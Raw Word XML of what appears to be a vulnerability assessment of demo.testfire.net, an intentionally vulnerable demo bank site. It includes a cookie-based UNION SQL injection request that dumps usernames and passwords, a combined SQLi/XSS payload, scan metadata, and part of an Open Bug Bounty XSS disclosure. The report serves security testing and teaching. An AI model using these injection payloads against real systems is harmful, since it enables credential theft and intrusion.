          <w:i w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Bold" w:eastAsia="Source Sans Pro Bold" w:hAnsi="Source Sans Pro Bold" w:cs="Source Sans Pro Bold"/>
          <w:b w:val="true"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> table</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="363835"/>
        <w:tblW w:w="10710" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="316"/>
        <w:gridCol w:w="10392"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1664"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="316"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r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10392"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GET /bank/main.aspx HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Host: demo.testfire.net</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>...</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>amUserInfo=UserName=YWRtaW4=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b w:val="true"/>
                <w:color w:val="999999"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>&amp;Password=YWRtaW4=;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> amUserId=2 union select username, password from users;--</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This will return:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="791600"/>
        <w:tblW w:w="1889" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="1559"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="2193"/>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r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="155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admin admin</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>cclay Ali</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>jsmith Demo1234</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>sjoe frazier</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>sspeed Demo1234</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>tuser tuser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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Simple, isn’t it?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:spacing w:after="257" w:before="257"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Semibold" w:eastAsia="Source Sans Pro Semibold" w:hAnsi="Source Sans Pro Semibold" w:cs="Source Sans Pro Semibold"/>
          <w:b w:val="false"/>
          <w:color w:val="000000"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>XSS using cookie data</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="22" w:name="_Toc8ickn3ihhpcr"/>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="240" w:before="240"/>
        <w:rPr>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Source Sans Pro Regular" w:eastAsia="Source Sans Pro Regular" w:hAnsi="Source Sans Pro Regular" w:cs="Source Sans Pro Regular"/>
          <w:color w:val="3D3D3D"/>
          <w:sz w:val="24"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Alternatively you could combine SQLi with XSS:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="290012"/>
        <w:tblW w:w="9360" w:type="dxa"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="0600"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="329"/>
        <w:gridCol w:w="9030"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="1929"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="329"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7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="7F7F7F"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9030" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:color="CCCCCC" w:val="single" w:sz="6" w:space="0"/>
              <w:left w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:bottom w:color="000000" w:val="none" w:sz="0" w:space="0"/>
              <w:right w:color="000000" w:val="none" w:sz="0" w:space="0"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
            <w:tcMar>
              <w:top w:w="0" w:type="dxa"/>
              <w:left w:w="0" w:type="dxa"/>
              <w:bottom w:w="0" w:type="dxa"/>
              <w:right w:w="0" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="top"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Normal"/>
              <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              <w:bidi w:val="false"/>
              <w:spacing w:line="336" w:after="96"/>
              <w:rPr>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>GET /bank/main.aspx HTTP/1.1</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>Host: demo.testfire.net</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>...</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>amUserInfo=UserName=YWRtaW4=</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b w:val="true"/>
                <w:color w:val="999999"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>&amp;Password=YWRtaW4=;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t xml:space="preserve"> amUserId=2 union select "</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>&lt;</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b w:val="true"/>
                <w:color w:val="008000"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>&gt;...&lt;/</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:b w:val="true"/>
                <w:color w:val="008000"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>script</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas Regular" w:eastAsia="Consolas Regular" w:hAnsi="Consolas Regular" w:cs="Consolas Regular"/>
                <w:color w:val="433A33"/>
                <w:sz w:val="18"/>
                <w:shd w:fill="F8F8F8" w:val="clear" w:color="auto"/>
              </w:rPr>
              <w:t>&gt;", "Injection FOUND!" from accounts;--</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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FFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Tested on:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">Mar 1st, 2021 20:41:42 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>GMT+5:30</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Server IP:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>65.61.137.117</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Reverse DNS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:spacing w:after="150"/>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Location:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">San Antonio </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distR="0" distB="0" distL="0">
            <wp:extent cx="152400" cy="104775"/>
            <wp:docPr id="2" name="Drawing 1" descr="United States"/>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152400" cy="104775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="25"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Client:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Desktop version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        <w:bidi w:val="false"/>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="274D5E"/>
          <w:sz w:val="27"/>
          <w:shd w:fill="FFFFFF" w:val="clear" w:color="auto"/>
        </w:rPr>
        <w:t>Data from,</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https://www.immuniweb.com/websec/demo.testfire.net/FhNBtmJo/</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https://wiki.owasp.org/index.php/AltoroMutual#URL</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VULNERABILITY IDENTIFICATION :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
          <w:b w:val="false"/>
          <w:i w:val="false"/>
          <w:strike w:val="false"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="0"/>
          <w:sz w:val="22"/>
          <w:u w:val="none"/>
          <w:shd w:fill="auto" w:val="clear" w:color="auto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr/>
        <w:spacing w:after="0" w:before="450"/>
        <w:ind w:left="-374"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:color w:val="F77A00"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>demo.testfire.net Cross Site Scripting Vulnerability</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:b w:val="false"/>
          <w:color w:val="F77A00"/>
          <w:sz w:val="30"/>
        </w:rPr>
        <w:t>Report ID: OBB-197026</w:t>
      </w:r>
      <w:r/>
      <w:bookmarkStart w:id="23" w:name="_Tocwarjveawppod"/>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="384" w:after="300"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Researcher </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
          <w:b w:val="true"/>
          <w:color w:val="278ABA"/>
          <w:sz w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://www.openbugbounty.org/researchers/Disst/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
          <w:b w:val="true"/>
          <w:color w:val="278ABA"/>
          <w:sz w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Disst</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>, a holder of 3 badges for responsible and coordinated disclosure, found Cross Site Scripting security vulnerability affecting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
          <w:b w:val="true"/>
          <w:color w:val="278ABA"/>
          <w:sz w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "http://demo.testfire.net/"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
          <w:b w:val="true"/>
          <w:color w:val="278ABA"/>
          <w:sz w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>demo.testfire.net</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> website and its users.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:pBdr/>
        <w:bidi w:val="false"/>
        <w:spacing w:line="384" w:after="300"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro Regular" w:eastAsia="DIN Pro Regular" w:hAnsi="DIN Pro Regular" w:cs="DIN Pro Regular"/>
          <w:color w:val="575756"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Following the coordinated and responsible vulnerability disclosure guidelines of the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="DIN Pro" w:eastAsia="DIN Pro" w:hAnsi="DIN Pro" w:cs="DIN Pro"/>
          <w:b w:val="true"/>
          <w:color w:val="278ABA"/>
          <w:sz w:val="21"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
        <w:instrText>HYPERLINK "https://www.iso.org/standard/45170.html"</w:instrText>
        <w:fldChar w:fldCharType="separate"/>
        <w:t/>
      </w:r>
      <w:r>
        <w:rPr>
